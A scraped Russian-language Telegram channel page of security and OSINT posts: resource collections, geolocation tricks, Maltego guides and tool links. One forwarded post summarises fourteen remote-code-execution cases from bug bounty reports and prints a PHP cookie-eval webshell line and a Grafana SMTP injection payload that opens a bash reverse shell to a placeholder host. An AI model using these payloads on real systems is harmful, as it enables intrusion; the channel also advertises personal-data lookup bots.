C.I.T. Security – Telegram
C.I.T. Security
8.17K subscribers
2.85K photos
259 videos
4.2K files
4.12K links
Софт, статьи, книги, базы данных и многое другое. Воруем все самое интересное с просторов телеграма и форумов.
Инф.войны и разведка: @cit_psyop
Курсы: @cit_course
Мусорка: https://news.1rj.ru/str/+WOFeU7VW2oYyZTI0
Боты пробива: @citsearchbot
@citsearch2bot
Download Telegram
Ultimate OSINT Collection

News & blogs
Newsletters
Books
How-to guides
CTFs
Podcasts
Tools collections

and more.

https://start.me/p/DPYPMz/the-ultimate-osint-collection

Contributor twitter.com/hatless1der
Forwarded from #Arm1tage
Remote Code Execution | Command Injection


RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.

1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.

2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.

3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}

4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.

5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./

6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.

7. RCE через SQL инъекцию. PoC.

8. Dependency Confusion. Об этом типе атак я делал пост ранее.

9. 0day уязвимости: Secure VPN.

10. RCE через картинки: ExifTool.

11. RCE через инъекцию опций в git.

12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"

13. Классический RCE через SSRF через Gopher. Статья.

14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.


#rce
😁5🥰2
Молния бот.
Добавлено СК42.

Бот поможет получить геоинформационные и метеоданные (спутниковые снимки, карты высот, скорость и направление ветра), а также создать карту по точке на карте и радиусу в километрах вокруг неё.
Теперь координаты и в СК42.
🔥1
Продвинутый поиск по никнейму – Shodan и Netlas

Наш перевод короткой статьи о том, как использовать IP поисковики для поиска по нику на примере Netlas.
👍2
Document Cloud

Поиск по более чем 50 млн. документам опубликованных верифицированными медиа и исследователями.

Публикации включают в себя CIA Crest (25-ти летний архив), отчеты, записи судебных дел, гос. проекты и многое другое.

Присутствуют операторы поиска Гугл-стайл
🔥1
Геолокация используя птиц

В случае с видео, особенно на природе, очень часто можно услышать/увидеть птиц.

Эти пернатые могут быть использованы для сужения региона поиска, используя сервисы по типу eBird.

Веб-сайт позволяет искать как по виду, так и по регионам. А для большего удобства, предоставляет аудио того, как эти птицы звучат.
Самый большой список официальных данных стран и регионов

DataPortals предоставляет обширный сборник официальных источников данных от лица разных стран и регионов.

Будет полезно для получения официальной статистики, новостей региона, гос. проектов и инициатив.
👍3
Using Maltego for #socmint (article from XIT)

Part 1. Installing and set up Maltego

https://x-it.medium.com/part1-social-media-investigation-using-maltego-39708087abaa

Part 2. 28 Powerful Data Integrations (transformation) for Maltego

https://x-it.medium.com/part2-social-media-investigation-28-powerful-data-integrations-for-maltego-44c8e2105565
See the history of Twitter profile username changes:

https://api.memory.lol/v1/tw/jr_majewski

(open link in browser and replace jr_majewski to other username)

Source code:

https://github.com/travisbrown/memory.lol

Creator twitter.com/travisbrown
Geolocating Practice: Non-Fatal Helicopter Crash

- Identify the exact location the Helicopter came to rest.

- Identify the Aircraft type, and registration.


https://osintteam.blog/geolocating-practice-non-fatal-helicopter-crash-c18aee7a95a8

Author: Geo Kenda
👍1
Open Source Munitions Portal

Archive of verified images from conflict zones. Search by:
- munition category
- condition
- characteristics
- shape
- mechanical features
- wall (thickness)

https://osmp.airwars.org/
Scallion — генератор ключей GPG и адреса .onion

Это управляемый графическим процессором Onion Hash Generator, написанный на C #, который позволяет создавать стандартные ключи GPG и адреса .onion (для скрытых сервисов Tor) с помощью OpenCL.

Ссылка на проект

GitHub | #Interesting #Web #Browser
👍1